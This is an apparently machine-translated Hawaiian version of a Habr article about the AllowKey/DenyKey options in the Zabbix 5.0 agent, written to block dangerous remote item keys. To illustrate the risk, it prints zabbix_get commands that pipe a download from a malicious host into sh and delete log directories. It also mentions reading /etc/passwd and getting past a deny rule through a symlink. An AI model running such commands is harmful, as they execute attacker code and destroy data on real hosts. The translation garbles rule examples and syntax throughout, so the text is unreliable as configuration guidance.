Kākoʻo papa inoa ʻeleʻele a me ka papa inoa keʻokeʻo no nā ana ʻaoʻao ʻāpana
ʻO Tikhon Uskov, Mea Hana Hoʻohui, Zabbix
Nā pilikia palekana ʻikepili
Loaʻa iā Zabbix 5.0 kahi hiʻohiʻona hou e hiki ai iā ʻoe ke hoʻomaikaʻi i ka palekana i nā ʻōnaehana me ka hoʻohana ʻana iā Zabbix Agent a hoʻololi i ka palena kahiko. EnableRemoteCommands.
ʻO ka hoʻomaikaʻi ʻana i ka palekana o nā ʻōnaehana e pili ana i nā mea kūʻai aku ma muli o ka hiki i kahi ʻelele ke hana i ka nui o nā hana weliweli.
- Hiki i ka ʻelele ke hōʻiliʻili kokoke i nā ʻike āpau, me ka ʻike huna a i ʻole nā pilikia weliweli, mai nā faila hoʻonohonoho, nā faila log, nā faila ʻōlelo huna, a i ʻole nā faila ʻē aʻe.
No ka laʻana, me ka hoʻohana ʻana i ka pono zabbix_get hiki iā ʻoe ke komo i kahi papa inoa o nā mea hoʻohana, kā lākou home directories, password file, etc.
Ke komo ʻana i ka ʻikepili me ka hoʻohana ʻana i ka pono zabbix_get
PAPA. Hiki ke kiʻi wale ʻia ka ʻikepili inā ua heluhelu ka luna i nā ʻae i ka faila pili. Akā, no ka laʻana, ka faila /etc/passwd/ hiki ke heluhelu ʻia e nā mea hoʻohana a pau.
- Hiki i ka ʻelele ke hoʻokō i nā kauoha hiki ke pilikia. No ka laʻana, kī *system.run[]** hiki iā ʻoe ke hoʻokō i nā kauoha mamao ma nā node pūnaewele, me ka holo ʻana i nā palapala mai ka pūnaewele pūnaewele Zabbix e hoʻokō pū ana i nā kauoha ma ka ʻaoʻao ʻelele.
# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]
# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]
- Ma Linux, holo ka luna ma ke ʻano maʻamau me ka ʻole o nā pono kumu, ʻoiai ma Windows e holo ʻo ia ma ke ʻano he lawelawe ʻo System a loaʻa iā ia ke komo ʻole i ka ʻōnaehana faila. No laila, inā ʻaʻohe hoʻololi i nā palena ʻo Zabbix Agent ma hope o ka hoʻokomo ʻana, hiki i ka luna ke komo i ke kākau inoa, ʻōnaehana faila a hiki ke hoʻokō i nā nīnau WMI.
I nā mana mua o ka palena EnableRemoteCommands=0 ʻae wale ʻia e hoʻopau i nā metric me ke kī *system.run[]** a me ka holo ʻana i nā palapala mai ka ʻaoʻao pūnaewele, akā ʻaʻohe ala e kaohi ai i ke komo ʻana i nā faila pākahi, ʻae a hoʻopau paha i nā kī pākahi i hoʻokomo ʻia me ka ʻelele, a i ʻole e kaupalena i ka hoʻohana ʻana i nā ʻāpana pākahi.
Ke hoʻohana nei i ka ʻāpana EnableRemoteCommand i nā mana mua o Zabbix
AllowKey/DenyKey
Kōkua ʻo Zabbix 5.0 i ka pale ʻana i kēlā ʻano ʻae ʻole ma o ka hāʻawi ʻana i nā papa inoa keʻokeʻo a me nā papa inoa ʻeleʻele no ka ʻae ʻana a me ka hōʻole ʻana i nā metric ma ka ʻaoʻao luna.
Ma Zabbix 5.0 nā kī āpau, me *system.run[]** ua hoʻohana ʻia, a ua hoʻohui ʻia ʻelua mau koho hoʻonohonoho luna hou:
AllowKey= - ʻae ʻia nā mākaʻikaʻi;
DenyKey= - nā māka pāpā ʻia;
Aia kahi kumu inoa nui me nā ʻāpana e hoʻohana ana i nā metacharacter (*).
ʻO nā kī AllowKey a me DenyKey e ʻae iā ʻoe e ʻae a hōʻole paha i nā ana hoʻokahi e pili ana i kahi kumu kikoʻī. ʻAʻole like me nā ʻāpana hoʻonohonoho ʻē aʻe, ʻaʻole i kaupalena ʻia ka helu o nā ʻāpana AllowKey/DenyKey. ʻAe kēia iā ʻoe e wehewehe pono i ka mea e hiki ai i ka mea hana ke hana i loko o ka ʻōnaehana ma o ka hana ʻana i kahi kumulāʻau o nā loiloi - nā kī hiki ke hoʻokō ʻia, kahi i hana nui ai ke kauoha i kākau ʻia ai.
Ke kaʻina o nā lula
Hoʻopaʻa ʻia nā lula ma ke ʻano i hoʻokomo ʻia i loko o ka faila hoʻonohonoho. Hoʻopaʻa ʻia ke kī e like me nā lula ma mua o ka pāʻani mua, a i ka wā e pili ana ke kī o ka mea ʻikepili i ke kumu, ʻae ʻia a hōʻole ʻia. Ma hope o kēia, pau ka nānā ʻana i ka lula a nānā ʻole ʻia nā kī i koe.
No laila, inā pili kekahi mea i ka lula ʻae a me ke kānāwai hōʻole, e hilinaʻi ka hopena i ka lula mua i ka faila hoʻonohonoho.
2 mau lula like ʻole me ke ʻano like a me ke kī vfs.file.size[/tmp/file]
ʻO ke kauoha o ka hoʻohana ʻana i nā kī AllowKey/DenyKey:
- rula pololei,
- nā lula maʻamau,
- rula kapu.
No ka laʻana, inā makemake ʻoe i ke komo ʻana i nā faila i loko o kekahi waihona, pono ʻoe e ʻae mua i ke komo ʻana iā lākou, a laila hōʻole i nā mea āpau ʻaʻole i hāʻule i loko o nā ʻae i hoʻokumu ʻia. Inā hoʻohana mua ʻia ka lula hōʻole, e hōʻole ʻia ke komo ʻana i ka waihona.
Kakau pololei
Inā pono ʻoe e ʻae i 2 mau pono e holo ma o *system.run[]**, a e kuhikuhi mua ʻia ka lula hōʻole, ʻaʻole e hoʻokuʻu ʻia nā pono hana, no ka mea e pili mau ke kumu mua i kekahi kī, a e nānā ʻole ʻia nā lula ma hope.
Ke kaʻina hewa
Nā hiʻohiʻona
Nā kulekele kumu
ʻO ka laʻana he hōʻike me nā kāleka. Hoʻohālikelike ka metacharacter (*) i kekahi helu o nā huaʻōlelo ma kahi kūlana kikoʻī. Hiki ke hoʻohana ʻia nā metacharacters ma ka inoa kī a ma nā ʻāpana. No ka laʻana, hiki iā ʻoe ke wehewehe pono i ka ʻāpana mua me ka kikokikona, a e kuhikuhi i ka mea ma hope e like me ka wildcard.
Pono e hoʻopaʻa ʻia nā ʻāpana i loko o nā bracket square [].
system.run[*
- hewavfs.file*.txt]
- hewavfs.file.*[*]
- akau
Nā laʻana o ka hoʻohana ʻana i ka wildcard.
- Ma ka inoa kī a ma ka palena. I kēia hihia, ʻaʻole pili ke kī i kahi kī like ʻole i loaʻa kahi ʻāpana, no ka mea ma ke ʻano i hōʻike ʻia e makemake mākou e loaʻa i kahi hopena o ka inoa kī a me kekahi mau ʻāpana.
- Inā ʻaʻole hoʻohana ke kumu i nā bracket square, ʻae ke kumu i nā kī āpau ʻaʻole i loaʻa nā ʻāpana a hōʻole i nā kī āpau i loaʻa ka ʻāpana i kuhikuhi ʻia.
- Inā kākau piha ʻia ke kī a hōʻike ʻia nā palena ma ke ʻano he wildcard, e kūlike ia i kekahi kī like me nā ʻāpana a ʻaʻole e kūlike i ke kī me ka ʻole o nā bracket square, ʻo ia hoʻi e ʻae ʻia a hōʻole ʻia.
Nā lula no ka hoʻopiha ʻana i nā ʻāpana.
- Inā hoʻohana ʻia kahi kī me nā ʻāpana, pono e kuhikuhi ʻia nā ʻāpana i ka faila hoʻonohonoho. Pono e kuhikuhi ʻia nā ʻāpana ma ke ʻano he metacharacter. Pono e hōʻole pono i ke komo ʻana i kekahi faila a e noʻonoʻo i ka ʻike e hiki ai i ka metric ke hāʻawi ma lalo o nā huaʻōlelo like ʻole - me nā ʻāpana ʻole.
Nā hiʻohiʻona o nā kī kākau me nā ʻāpana
- Inā hōʻike ʻia kahi kī me nā ʻāpana, akā he koho nā ʻāpana a hoʻopaʻa ʻia ma ke ʻano he metacharacter, e hoʻoholo ʻia kahi kī me ka ʻole. No ka laʻana, inā makemake ʻoe e hoʻopau i ka loaʻa ʻana o ka ʻike e pili ana i ka ukana ma ka CPU a e kuhikuhi i ke kī ʻo system.cpu.load [*] pono e hoʻopau ʻia, mai poina e hoʻihoʻi ke kī me ka ʻole o ka hoʻohālikelike ʻana i ka waiwai ukana maʻamau.
Nā lula no ka hoʻopiha ʻana i nā ʻāpana
Nā Nānā
hoʻoponopono
- ʻAʻole hiki ke hoʻololi ʻia kekahi mau lula e ka mea hoʻohana, no ka laʻana, nā lula ʻike a i ʻole nā lula hoʻopaʻa inoa ʻokoʻa. ʻAʻole pili nā lula ʻo AllowKey/DenyKey i kēia mau ʻāpana:
- HostnameItem
- HostMetadataItem
- HostInterfaceItem
PAPA. Inā hoʻopau ka luna hoʻomalu i kahi kī, i ka wā e nīnau ʻia ai, ʻaʻole hāʻawi ʻo Zabbix i ka ʻike e pili ana i ke kumu e hāʻule ai ka metric a i ʻole ke kī i ka ' waeʻano.AOLE I KOKUA'. ʻAʻole hōʻike ʻia ka ʻike e pili ana i nā pāpā i ka hoʻokō ʻana i nā kauoha mamao ma nā faila log agent. No nā kumu palekana kēia, akā hiki ke paʻakikī i ka debugging inā hāʻule nā metric i kahi ʻāpana i kākoʻo ʻole ʻia no kekahi kumu.
- ʻAʻole pono ʻoe e hilinaʻi i kekahi kauoha kikoʻī no ka hoʻopili ʻana i nā faila hoʻonohonoho waho (no ka laʻana, ma ke ʻano pīʻāpā).
Nā pono laina kauoha
Ma hope o ka hoʻonohonoho ʻana i nā lula, pono ʻoe e hōʻoia ua hoʻonohonoho pono ʻia nā mea āpau.
Hiki iā ʻoe ke hoʻohana i kekahi o nā koho ʻekolu:
- Hoʻohui i kahi metric iā Zabbix.
- Hoao me zabbix_agentd. ʻO Zabbix agent me kahi koho -paʻi (-p) hōʻike i nā kī āpau (i ʻae ʻia e ka paʻamau) koe nā mea i ʻae ʻole ʻia e ka hoʻonohonoho. A me ke koho -hōʻike (-t) no ka mea, e hoʻi mai ke kī kapu 'Kākoʻo 'ikamu kī'.
- Hoao me zabbix_get. Mea hoohana zabbix_get me ke koho -k e hoʻi 'ZBX_NOTSUPPORTED: ʻAʻole ʻike ʻia ke ana'.
ʻAe a hōʻole paha
Hiki iā ʻoe ke hōʻole i ke komo ʻana i kahi faila a hōʻoia, no ka laʻana, me ka hoʻohana ʻana i ka pono zabbix_getua hōʻole ʻia ke komo ʻana i ka faila.
**
PAPA. ʻAʻole mālama ʻia nā huaʻōlelo ma ka ʻāpana.
I kēia hihia, hiki ke ʻae ʻia ke komo ʻana i ia faila ma ke ala ʻē aʻe. No ka laʻana, inā alakaʻi kahi symlink iā ia.
Manaʻo ʻia e nānā i nā koho like ʻole no ka hoʻopili ʻana i nā lula i ʻōlelo ʻia, a e noʻonoʻo pū i nā hiki ke pale i nā pāpā.
Nā nīnau a me nā pane
Kou nīnau. No ke aha i koho ʻia ai kahi ʻano paʻakikī me kāna ʻōlelo ponoʻī e wehewehe i nā lula, nā ʻae a me nā pāpā? No ke aha i hiki ʻole ai ke hoʻohana, no ka laʻana, nā ʻōlelo maʻamau a Zabbix e hoʻohana ai?
ʻO ka pane. He pilikia hoʻokō regex kēia no ka mea he hoʻokahi wale nō ʻelele a nānā ʻo ia i ka nui o nā metric. He hana koʻikoʻi ʻo Regex a ʻaʻole hiki iā mākou ke nānā i nā kaukani metric ma kēia ala. Wildcards - he hoʻonā ākea, hoʻohana nui a maʻalahi.
Kou nīnau. ʻAʻole anei i hoʻokomo ʻia nā faila Include ma ka papa pīʻāpā?
ʻO ka pane. E like me kaʻu i ʻike ai, aneane hiki ʻole ke wānana i ke ʻano o nā lula e hoʻopili ʻia inā ʻoe e hoʻolaha i nā lula ma nā faila like ʻole. Manaʻo wau e hōʻiliʻili i nā lula ʻo AllowKey/DenyKey i hoʻokahi waihona Include, no ka mea pili lākou i kekahi i kekahi, a me kēia faila..
Kou nīnau. Ma Zabbix 5.0 ke koho 'EnableRemoteCommands=' ua nalo mai ka waihona hoʻonohonoho, a ʻo AllowKey/DenyKey wale nō ke loaʻa?
Pane. ʻAe pololei kēlā.
Nā mea hou aku!
Source: www.habr.com